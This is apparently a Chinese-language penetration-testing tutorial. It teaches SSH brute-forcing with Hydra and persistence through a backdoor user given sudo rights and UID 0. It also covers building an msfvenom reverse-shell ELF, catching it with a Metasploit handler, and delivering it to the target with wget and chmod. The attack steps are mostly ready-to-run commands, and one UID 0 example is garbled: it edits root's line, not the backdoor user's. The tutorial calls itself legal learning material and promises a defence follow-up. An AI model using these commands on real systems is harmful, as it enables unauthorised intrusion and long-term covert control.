在上篇中我们掌握了 Linux 的基础操作、权限管理和系统配置而 Linux 作为网络攻防的 “主战场”核心价值体现在实战攻防中。本篇将从网安实战角度讲解 Linux 核心攻防场景SSH 服务攻防与木马入侵让你能从攻击者视角实现渗透控制。一、实战前提为什么 Linux 是网安核心市场占比全球 80% 以上的服务器使用 Linux 系统攻击服务器的破坏和影响远大于个人电脑实战场景真实网络攻防中Linux 是主流目标掌握 Linux 攻防是网安从业者的必备技能系统特性开源透明、权限严格、命令行操作灵活既为攻击者提供了渗透空间也为防御者提供了丰富的加固手段。本次实战基于Kali Linux攻击机和Ubuntu/CentOS目标机所有操作均为合法学习用途未经授权禁止对他人系统进行测试遵守《网络安全法》。二、SSH 服务攻防远程控制的核心战场SSH 协议是 Linux 远程管理的核心类似 Windows 的 RDP支持跨地域远程控制服务器也是攻击者的首要渗透目标 —— 拿下 SSH 权限就相当于掌握了目标服务器的 “大门钥匙”。1. 先搭环境SSH 服务安装与配置以 UbuntuDebian 系列为例完成 SSH 服务的基础配置RedHat 系列CentOS操作逻辑一致包管理器换为 yum 即可。步骤 1切换到 root 用户需最高权限sudo su步骤 2安装 SSH 服务apt install openssh-server步骤 3修改 SSH 配置文件允许 root 远程登录 密码认证nano /etc/ssh/sshd_config找到以下配置项删除 #注释并修改PermitRootLogin yes # 允许root用户远程登录PasswordAuthentication yes # 允许密码认证修改完成后按CtrlX→Y→回车保存退出。步骤 4重启 SSH 服务使配置生效service ssh restart远程连接测试Xshell/CRT打开远程连接工具输入目标机 IP端口 22输入 root 账号密码连接成功即表示 SSH 环境搭建完成。2. SSH 攻击实战漏洞排查 暴力破解攻击者拿下 SSH 权限的核心方式之一是暴力破解利用工具批量尝试密码组合破解弱口令前提是目标机开启密码认证、且密码复杂度低。1漏洞排查先查询 SSH 版本判断是否存在历史漏洞若版本无漏洞则转向暴力破解2暴力破解Hydra 工具Kali 自带Hydra 是开源密码破解工具支持 SSH、FTP 等多种协议核心原理是读取密码字典批量尝试登录。核心命令hydra -l 用户名 -P 密码字典路径 ssh://目标机IP实操示例hydra -l root -P pass.txt ssh://192.168.20.1483. 权限维持植入后门用户破解 SSH 密码后为避免目标用户修改密码导致失去控制权攻击者会植入后门用户实现长期控制核心步骤步骤 1创建后门用户并设置密码useradd -m hack # 创建hack用户-m自动创建用户目录passwd hack # 给hack设置密码步骤 2配置 sudo 权限让普通用户拥有 root 权限nano /etc/sudoers找到root ALL(ALL:ALL) ALL并在下面添加hack ALL(ALL:ALL) ALL保存退出后hack 用户即可通过sudo 命令执行 root 权限操作。步骤 3进阶操作设置用户为超级用户UID0修改/etc/passwd文件将 hack 用户的 UID 改为 0使其拥有和 root 完全相同的最高权限使用nano /etc/passwd找到 root:x:0:0:root:/root:/bin/bash修改为 root:x:0:0:hakc:/root:/bin/bash三、木马入侵检测长期控制的核心手段拿下 SSH 权限后攻击者会通过植入木马实现对目标机的长期隐蔽控制让目标机成为 “肉鸡”可随时执行命令、窃取数据。本次实战使用 Kali 自带的MSF 框架制作 Linux 木马完成入侵与权限维持。1. 木马核心概念木马是伪装成合法软件的恶意程序具备隐蔽性和控制性与向日葵等正规远程工具的核心区别用户不知情、后台隐蔽运行危害是让目标机被攻击者远程操控成为网络攻击的跳板。2. 木马攻击三步骤制作→植入→启动步骤 1制作 Linux 木马MSFvenom 工具MSFvenom 是 MSF 框架的木马生成工具生成反向连接木马目标机主动连接攻击机绕过防火墙核心命令msfvenom -p linux/x64/shell/reverse_tcp LHOST攻击机IP LPORT攻击机端口 -f elf -o shell.elf-p指定木马载荷linux/x64/shell/reverse_tcp 为 Linux64 位反向 shellLHOST攻击机 IPKali 的 IPLPORT攻击机监听端口自定义如 9999未被占用即可-f elf指定木马格式为 Linux 可执行文件-o指定木马输出名如 shell.elf。执行成功后当前目录会生成shell.elf木马文件。步骤 2攻击机启动监听MSFconsole启动 MSF 控制台配置监听模块等待目标机木马连接核心命令# 启动MSF控制台 msfconsole# 选择多处理模块 use exploit/multi/handler# 设置与木马一致的载荷 set payload linux/x64/shell/reverse_tcp# 设置监听IP攻击机IP set lhost IP# 设置监听端口与木马一致9999 set lport 9999# 启动监听 run步骤 3将木马植入目标机并启动通过 SSH 权限将攻击机的木马文件传输到目标机核心方式Apache 服务提供下载目标机 wget 下载攻击机操作开启 Apache 服务共享木马# 将木马移动到Apache网页根目录 mv shell.elf /var/www/html# 启动Apache服务 service apache2 start目标机操作通过 wget 下载木马# 从攻击机下载木马保存为shell.elf wget http://攻击机IP/shell.elf -O shell.elf解决权限问题启动木马目标机下载的木马默认无执行权限需添加执行权限后启动# 添加执行权限 chmod x shell.elf# 启动木马 ./shell.elf木马启动后攻击机的 MSF 控制台会成功建立会话此时攻击者即可在 MSF 中执行任意 Linux 命令完全控制目标机。上述介绍了SSH 服务攻防与木马入侵知道了如何攻击那么下篇我们将进入Linux 网络安全的系统安全加固教你如何防御。